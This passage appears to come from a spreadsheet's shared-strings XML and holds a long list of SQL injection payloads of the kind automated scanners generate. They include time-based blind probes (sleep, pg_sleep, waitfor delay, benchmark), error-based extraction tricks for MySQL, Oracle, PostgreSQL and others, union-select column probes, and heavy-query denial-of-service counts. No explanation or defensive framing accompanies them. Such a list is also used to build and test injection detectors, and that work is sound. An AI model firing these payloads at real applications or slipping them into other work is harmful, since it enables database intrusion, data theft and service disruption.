    <t>1 where 1015 = 1015</t>
  </si>
  <si>
    <t>-4807' where 3232 = 3232 or make_set ( 6599 = 5179,5179 ) --</t>
  </si>
  <si>
    <t>1" where 5333 = 5333 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-9347' )  union all select 3884,3884#</t>
  </si>
  <si>
    <t xml:space="preserve">-7574%" )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr </t>
  </si>
  <si>
    <t>1' where 5060 = 5060</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 9693 = 9693,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) </t>
  </si>
  <si>
    <t>-9659  )  )   )  union all select 8665,8665,8665,8665,8665,8665,8665--</t>
  </si>
  <si>
    <t>-1755%' union all select 2615,2615,2615,2615,2615,2615#</t>
  </si>
  <si>
    <t>1" )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( "nnmz" like "nnmz</t>
  </si>
  <si>
    <t>-6492' )  union all select 7204,7204--</t>
  </si>
  <si>
    <t xml:space="preserve">-3628" or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) </t>
  </si>
  <si>
    <t>1"  )  )   and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1'+ ( select 'drvv' where 5622 = 5622 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-6618"  )  )   )  order by 1#</t>
  </si>
  <si>
    <t>-3359' order by 1--</t>
  </si>
  <si>
    <t>-5518 )  as yvqm where 7360 = 7360 union all select 7360,7360#</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (  'vxxg' = 'vxxg</t>
  </si>
  <si>
    <t>1' )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and  ( 'urxs' = 'urxs</t>
  </si>
  <si>
    <t>1'  )  )   )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( 'cenk' = 'cenk</t>
  </si>
  <si>
    <t>1'+ ( select qpaf where 7859 = 7859 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu  )  )  +'</t>
  </si>
  <si>
    <t>1'  )  )   and 2832 = 4165--</t>
  </si>
  <si>
    <t>1  )  )   and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  5200 = 5200</t>
  </si>
  <si>
    <t>1"  )  )   and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  "vjvz" like "vjvz</t>
  </si>
  <si>
    <t>-5205'  )  )   union all select 8592,8592,8592,8592,8592,8592--</t>
  </si>
  <si>
    <t>1' )  and  ( 3020 = 3020 ) *6703 and  ( 'rskq' = 'rskq</t>
  </si>
  <si>
    <t>1' )  as pfwt where 8448 = 8448 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-3862'  )  )   union all select 2495,2495,2495,2495,2495,2495,2495--</t>
  </si>
  <si>
    <t>select  ( case when  ( 4205 = 9574 )  then 4205 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 3531 = 3531 )  then  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  else 3531 end  )  )  </t>
  </si>
  <si>
    <t>1'|| ( select 'zzkx' where 3270 = 3270 and 2006 = 2006</t>
  </si>
  <si>
    <t>1"  )  )   and 5421 = 4804--</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  "ewsr" like "ewsr</t>
  </si>
  <si>
    <t>1" )  as fkco where 8877 = 8877 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>1%" )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>1%' )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>1%" and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-6518'  )  )   as vocx where 2539 = 2539 or  ( 8652 = 2025 ) *2025--</t>
  </si>
  <si>
    <t>1"  )  )   )  and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (   ( "ilge" like "ilge</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 6461 = 1802 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual ) </t>
  </si>
  <si>
    <t>1'  )  )   as tley where 3539 = 3539</t>
  </si>
  <si>
    <t>1%' )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>-1418" )  where 7528 = 7528 order by 1#</t>
  </si>
  <si>
    <t>-2325 )  union all select 4692,4692,4692,4692#</t>
  </si>
  <si>
    <t>1'|| ( select 'bqhi' from dual where 7409 = 7409</t>
  </si>
  <si>
    <t>1'  )  )   as qaki where 5272 = 5272</t>
  </si>
  <si>
    <t>1'  )  )   or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (  'skdm' = 'skdm</t>
  </si>
  <si>
    <t>1%" and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-3347%" or 9323 = 9323#</t>
  </si>
  <si>
    <t>-8187'  )  )   )  or 1698 = 2823#</t>
  </si>
  <si>
    <t>1" )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( "ctrr" = "ctrr</t>
  </si>
  <si>
    <t>1" )  where 2702 = 2702 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 9393 = 5530 )  then 9393 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1' )  where 6045 = 6045</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1%" and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and "%" = "</t>
  </si>
  <si>
    <t>1%"  )  )   )  and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1 )  where 2010 = 2010</t>
  </si>
  <si>
    <t>1" )  where 8196 = 8196</t>
  </si>
  <si>
    <t>1 where 8095 = 8095</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and   (  (   ( 'ldqq' = 'ldqq</t>
  </si>
  <si>
    <t>-5432' )  as dndq where 9633 = 9633 order by 1#</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and   (  (   ( 'xori' like 'xori</t>
  </si>
  <si>
    <t>1'|| ( select 'pmpd' where 9803 = 9803</t>
  </si>
  <si>
    <t>-8312%"  )  )   union all select 4972--</t>
  </si>
  <si>
    <t>1 where 8180 = 8180 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1%"  )  )   )  or sleep ( 5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1%'  )  )   or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1' )  where 9817 = 9817</t>
  </si>
  <si>
    <t>1  )  )   as bjxd where 4299 = 4299</t>
  </si>
  <si>
    <t>1"  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1'  )  )   )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( 'eflk' = 'eflk</t>
  </si>
  <si>
    <t>1%" )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1%"  )  )   )  or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( 'iuki' = 'iuki</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (   ( 'mgbm' like 'mgbm</t>
  </si>
  <si>
    <t>1' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and 'moyb' = 'moyb</t>
  </si>
  <si>
    <t>1" )  union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1%"  )  )   or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and   (  (   ( 'rzjf' = 'rzjf</t>
  </si>
  <si>
    <t>-9572%" )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 12</t>
  </si>
  <si>
    <t>1"  )  )   rlike sleep ( 5 )  and   (  (  "fzlr" = "fzlr</t>
  </si>
  <si>
    <t>-7715' )  union all select 4830,4830,4830,4830,4830,4830,4830,4830--</t>
  </si>
  <si>
    <t>1'  )  )   as usrk where 6324 = 6324 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'+ ( select lhtn where 8484 = 8484 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t>-4028 )  where 3244 = 3244 union all select 3244,3244,3244,3244,3244,3244,3244,3244--</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1%" )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1 )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and   (  (   ( 5552 = 5552</t>
  </si>
  <si>
    <t>1 )  as jvmv where 3857 = 3857 and  ( 5717 = 6483 ) *6483--</t>
  </si>
  <si>
    <t>1 )  where 2678 = 2678 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select case when 5559 = 3483 then 1 else null end--</t>
  </si>
  <si>
    <t>1' and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and 'napi' like 'napi</t>
  </si>
  <si>
    <t xml:space="preserve">-9688%'  )  )   or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char </t>
  </si>
  <si>
    <t>1' and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and 'ixzr' = 'ixzr</t>
  </si>
  <si>
    <t xml:space="preserve">1" and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) </t>
  </si>
  <si>
    <t>1' )  as uqkz where 8482 = 8482 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1 )  and 2457 = 8146</t>
  </si>
  <si>
    <t>1' )  as lrif where 6525 = 6525 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --</t>
  </si>
  <si>
    <t>1' in boolean mode )  or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1'  )  )   as ydbt where 8062 = 8062 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1  )  )   )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( 4744 = 4744</t>
  </si>
  <si>
    <t>1' )  as dwgv where 1525 = 1525 union all select null,null--</t>
  </si>
  <si>
    <t>1%"  )  )   )  and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 3626 = 6022 )  then 3626 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>-3315"  )  )   )  union all select 2457,2457,2457,2457,2457,2457--</t>
  </si>
  <si>
    <t>1'+ ( select jxgx where 7446 = 7446 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and 'bpbe' like 'bpbe</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  </t>
  </si>
  <si>
    <t>-7824"  )  )   )  union all select 3800,3800,3800,3800,3800,3800,3800,3800,3800--</t>
  </si>
  <si>
    <t>1 )  where 7485 = 7485 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) # kkmw</t>
  </si>
  <si>
    <t>1  )  )   as gcvw where 7363 = 7363 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1"  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and "lxfm" = "lxfm</t>
  </si>
  <si>
    <t>1%" )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1" union all select null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">1 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) </t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (  'ilcv' = 'ilcv</t>
  </si>
  <si>
    <t>-5174'  )  )   )  or make_set ( 9515 = 7938,7938 )  and   (  (   ( 'ygee' = 'ygee</t>
  </si>
  <si>
    <t>1" )  where 6843 = 6843 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-9212 or 1026 = 7967#</t>
  </si>
  <si>
    <t>1'|| ( select 'sned' where 4957 = 4957 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1  )  )   waitfor delay '0:0:5' and   (  (  1636 = 1636</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) </t>
  </si>
  <si>
    <t>1' )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and  ( 'gfxr' = 'gfxr</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (  'xlvt' = 'xlvt</t>
  </si>
  <si>
    <t>1" where 7796 = 7796</t>
  </si>
  <si>
    <t>-7184 )  as fshx where 3408 = 3408 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 11</t>
  </si>
  <si>
    <t xml:space="preserve">select sleep ( 5 ) </t>
  </si>
  <si>
    <t>1' )  where 8776 = 8776 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1"  )  )   and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1 )  as dqda where 1624 = 1624 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1 where 8114 = 8114 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-7329"  )  )   )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( "borw" like "borw</t>
  </si>
  <si>
    <t>1  )  )   as shmg where 1371 = 1371 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select  ( case when  ( 1434 = 1549 )  then 1434 else 1434* ( select 1434 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1" where 3484 = 3484 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-9289  )  )   or make_set ( 5101 = 9919,9919 )  and   (  (  8977 = 8977</t>
  </si>
  <si>
    <t>1'  )  )   as zqeg where 4729 = 4729 and  ( 1098 = 9682 ) *9682--</t>
  </si>
  <si>
    <t>select  ( case when  ( 1724 = 6528 )  then 1724 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1%'  )  )   and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1%"  )  )   or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  'novq' = 'novq</t>
  </si>
  <si>
    <t>1 )  where 6340 = 6340 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and 'nkte' = 'nkte</t>
  </si>
  <si>
    <t>1'+ ( select 'aliz' where 5050 = 5050 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  )  +'</t>
  </si>
  <si>
    <t>1" )  as hoiv where 9708 = 9708 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>1" rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'goxu' where 9215 = 9215 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'aojt' from dual where 8499 = 8499</t>
  </si>
  <si>
    <t>1" where 4597 = 4597 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1" or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and "xmvr" = "xmvr</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or sleep ( 5 ) </t>
  </si>
  <si>
    <t>1 )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( 9509 = 9509</t>
  </si>
  <si>
    <t>1" )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1" )  or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-5190%" or 8298 = 9306 and "%" = "</t>
  </si>
  <si>
    <t>1 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1'  )  )   as arhm where 3268 = 3268 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 5777 = 5777 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual ) </t>
  </si>
  <si>
    <t>-5097' )  union all select 8992,8992,8992,8992,8992,8992,8992,8992,8992--</t>
  </si>
  <si>
    <t>-8945  )  )   as fszo where 2320 = 2320 union all select 2320--</t>
  </si>
  <si>
    <t>1 )  as odqn where 3910 = 3910</t>
  </si>
  <si>
    <t>1 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) -- wvjy</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (   ( 'ineq' like 'ineq</t>
  </si>
  <si>
    <t xml:space="preserve">make_set ( 2672 = 2672,5440 ) </t>
  </si>
  <si>
    <t>1"  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1'  )  )   )  and sleep ( 5 )  and   (  (   ( 'hwjy' = 'hwjy</t>
  </si>
  <si>
    <t>1' and  ( 3020 = 3020 ) *6703</t>
  </si>
  <si>
    <t>1  )  )   as xebl where 3105 = 3105 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1"  )  )   as aozi where 3354 = 3354 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>-9698'  )  )   as qnjv where 3360 = 3360 or make_set ( 9354 = 9354,7185 ) --</t>
  </si>
  <si>
    <t>-8301'  )  )   )  or  ( 5708 = 5268 ) *5268 and   (  (   ( 'hkha' = 'hkha</t>
  </si>
  <si>
    <t>1%'  )  )   and 9198 = 9198--</t>
  </si>
  <si>
    <t>-9145' )  as xyya where 8950 = 8950 union all select 8950,8950,8950,8950,8950,8950,8950,8950--</t>
  </si>
  <si>
    <t xml:space="preserve">1 ) </t>
  </si>
  <si>
    <t>1%'  )  )   and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">-7242' or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 </t>
  </si>
  <si>
    <t xml:space="preserve">-3613%' )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( </t>
  </si>
  <si>
    <t>select  ( case when  ( 4568 = 4241 )  then 4568 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1%" or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1' )  and sleep ( 5 )  and  ( 'njud' = 'njud</t>
  </si>
  <si>
    <t>1'+ ( select qydm where 6019 = 6019</t>
  </si>
  <si>
    <t>1 where 8074 = 8074 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
